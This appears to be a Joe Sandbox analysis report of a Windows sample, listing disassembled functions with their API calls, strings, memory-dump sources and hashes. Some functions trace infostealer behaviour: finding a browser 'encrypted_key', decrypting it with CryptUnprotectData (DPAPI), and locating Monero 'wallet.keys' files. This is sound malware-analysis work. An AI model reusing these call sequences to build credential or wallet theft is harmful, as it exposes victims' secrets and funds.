                                    Function 00C937B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 0e25c9f8d482e6c5d905c54d692e5e59ea3182b12333b803e3028449cb1417d5
                                    • Instruction ID: 227c42f430efd8fabf420b91820e370ea634c094f7877f8286b1899631e06129
                                    • Opcode Fuzzy Hash: 0e25c9f8d482e6c5d905c54d692e5e59ea3182b12333b803e3028449cb1417d5
                                    • Instruction Fuzzy Hash: C741F871D0420A9BCF04EFE5D859AEEB778AF44304F108029F51676290EB74AB45DFA5
                                    Function 00C8A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                      • Part of subcall function 00C8A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8A13C
                                      • Part of subcall function 00C8A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C8A161
                                      • Part of subcall function 00C8A110: LocalAlloc.KERNEL32(00000040,?), ref: 00C8A181
                                      • Part of subcall function 00C8A110: ReadFile.KERNEL32(000000FF,?,00000000,00C8148F,00000000), ref: 00C8A1AA
                                      • Part of subcall function 00C8A110: LocalFree.KERNEL32(00C8148F), ref: 00C8A1E0
                                      • Part of subcall function 00C8A110: CloseHandle.KERNEL32(000000FF), ref: 00C8A1EA
                                      • Part of subcall function 00C98FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00C98FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00C8A489
                                      • Part of subcall function 00C8A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A23F
                                      • Part of subcall function 00C8A210: LocalAlloc.KERNEL32(00000040,?,?,?,00C84F3E,00000000,?), ref: 00C8A251
                                      • Part of subcall function 00C8A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00C84F3E,00000000,00000000), ref: 00C8A27A
                                      • Part of subcall function 00C8A210: LocalFree.KERNEL32(?,?,?,?,00C84F3E,00000000,?), ref: 00C8A28F
                                      • Part of subcall function 00C8A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00C8A2D4
                                      • Part of subcall function 00C8A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00C8A2F3
                                      • Part of subcall function 00C8A2B0: LocalFree.KERNEL32(?), ref: 00C8A323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 236f6ee36005130eb622e046f10bb453878a5fed9cfe7e0c83e532c96ca55c57
                                    • Instruction ID: fc7e0ddb7dd9fbfa870c4eb49d88c44deb4b9832df8affdfaa6d1c47f54939d8
                                    • Opcode Fuzzy Hash: 236f6ee36005130eb622e046f10bb453878a5fed9cfe7e0c83e532c96ca55c57
                                    • Instruction Fuzzy Hash: 013161B6D0020DABDF04EFE4DC45AEFB3B8BF59308F044519E915A3241EB349A45CBA6
                                    Function 00C98810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C9AA50: lstrcpy.KERNEL32(00CA0E1A,00000000), ref: 00C9AA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00CA05BF), ref: 00C9885A
                                    • Process32First.KERNEL32(?,00000128), ref: 00C9886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00C98883
                                      • Part of subcall function 00C9ACC0: lstrlen.KERNEL32(?,015289E0,?,\Monero\wallet.keys,00CA0E1A), ref: 00C9ACD5
                                      • Part of subcall function 00C9ACC0: lstrcpy.KERNEL32(00000000), ref: 00C9AD14
                                      • Part of subcall function 00C9ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00C9AD22
                                      • Part of subcall function 00C9ABB0: lstrcpy.KERNEL32(?,00CA0E1A), ref: 00C9AC15
                                    • CloseHandle.KERNEL32(?), ref: 00C988F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 402fb318df5d50a4463de45d7a685321abd32688e0f4a0376cea8b226604f959
                                    • Instruction ID: 00dec317e90729ccb4ff1473ca043fe4332eacbd48961ff7e508d2b331359c57
                                    • Opcode Fuzzy Hash: 402fb318df5d50a4463de45d7a685321abd32688e0f4a0376cea8b226604f959
                                    • Instruction Fuzzy Hash: 48314871901218ABCF24EF95DD59FEEB778EB45700F1045A9F10AA61A0DB306B48DFA1
                                    Function 00CFFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CFFE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CFFE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: 6b2cd6d0d470a14ecbbf802e646ed0390a67bf55acf9bbd76c88f9bb91551ecd
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: 7C01B136109729AEF67526755CC9A763A94EF017B5734433DF22A801F2EF924C429161
                                    Function 00C97B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00CA0DE8,00000000,?), ref: 00C97B40
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00C97B47
                                    • GetLocalTime.KERNEL32(?,?,?,?,?,00CA0DE8,00000000,?), ref: 00C97B54
                                    • wsprintfA.USER32 ref: 00C97B83
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 5c4f4adb175cb0f29e901be172204b2df2a23376ca4e13907945ad17ff6b1e86
                                    • Instruction ID: d663ef63d13b590d0546a78f59db8a2ef48b50c6c5684f839cdfed620b646e0f
                                    • Opcode Fuzzy Hash: 5c4f4adb175cb0f29e901be172204b2df2a23376ca4e13907945ad17ff6b1e86
                                    • Instruction Fuzzy Hash: ED11FEB2908219ABCB14DBD9ED45BBFB7F8EB4CB12F10415AF605A2280D7795940D7B0
                                    Function 00C99470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00C93D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00C93D3E,?), ref: 00C9948C
                                    • GetFileSizeEx.KERNEL32(000000FF,00C93D3E), ref: 00C994A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 00C994B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 641e7c58ddeeb0a9e71652a7ce717d880ce9d1260d8e299b6cf3a9ce6fc92af1
                                    • Instruction ID: d4d56b27dad2fc88208db9a991f574603db21275f74fa4df4ac24ebcdedf1cef
                                    • Opcode Fuzzy Hash: 641e7c58ddeeb0a9e71652a7ce717d880ce9d1260d8e299b6cf3a9ce6fc92af1
                                    • Instruction Fuzzy Hash: ADF03C39E04308BBDB10EBB5EC49F9E77B9AB48711F108658FA11A7280D670A6019F90
                                    Function 00C9CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00C9CA7E
                                      • Part of subcall function 00C9C2A0: __amsg_exit.LIBCMT ref: 00C9C2B0
                                    • __getptd.LIBCMT ref: 00C9CA95
                                    • __amsg_exit.LIBCMT ref: 00C9CAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00C9CAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 5f1e4816d0422af9855fd406bba5c1d7fbf0127a9ba3b6be4841452ef93edc4a
                                    • Instruction ID: d6fe6e3ad1b4a14cadadabdbbdd577d2e47308b90ddddebd33b2c089f1e1cf7c
                                    • Opcode Fuzzy Hash: 5f1e4816d0422af9855fd406bba5c1d7fbf0127a9ba3b6be4841452ef93edc4a
                                    • Instruction Fuzzy Hash: 3DF0B432944B19ABDF20FBF8A88F75E33A0AF01724F510149F415A71D2CF245D40BB95
                                    Function 00D004D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: 7cafab767e5af7a6304e7f8baaabfcec2c297726584d41c96e5eedb4f0b4b0c6
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: 71414971900209AFDF15DF98DC85BEEBBB5FF48304F188199FA08A62A1D3359A50DF61
                                    Function 00C95190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C98F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C98F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C951CA
                                    • lstrcat.KERNEL32(?,00CA1058), ref: 00C951E7
                                    • lstrcat.KERNEL32(?,01528910), ref: 00C951FB
                                    • lstrcat.KERNEL32(?,00CA105C), ref: 00C9520D
                                      • Part of subcall function 00C94B60: wsprintfA.USER32 ref: 00C94B7C
                                      • Part of subcall function 00C94B60: FindFirstFileA.KERNEL32(?,?), ref: 00C94B93
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA0FC4), ref: 00C94BC1
                                      • Part of subcall function 00C94B60: StrCmpCA.SHLWAPI(?,00CA0FC8), ref: 00C94BD7
                                      • Part of subcall function 00C94B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00C94DCD
                                      • Part of subcall function 00C94B60: FindClose.KERNEL32(000000FF), ref: 00C94DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: cabaa7a63f4987b7c60d4699c30aefdd6244a720dc2b1f7a0caa9eb92db024c0
                                    • Instruction ID: 337252ba0feec4d26048e8a4e66df23bed270b5197d7af0083bdc368f46f7eb1
                                    • Opcode Fuzzy Hash: cabaa7a63f4987b7c60d4699c30aefdd6244a720dc2b1f7a0caa9eb92db024c0
                                    • Instruction Fuzzy Hash: 7E21F5B690030CABCB14FBB0FC46EED733C9B95701F404554B65593491EE70AAC89F91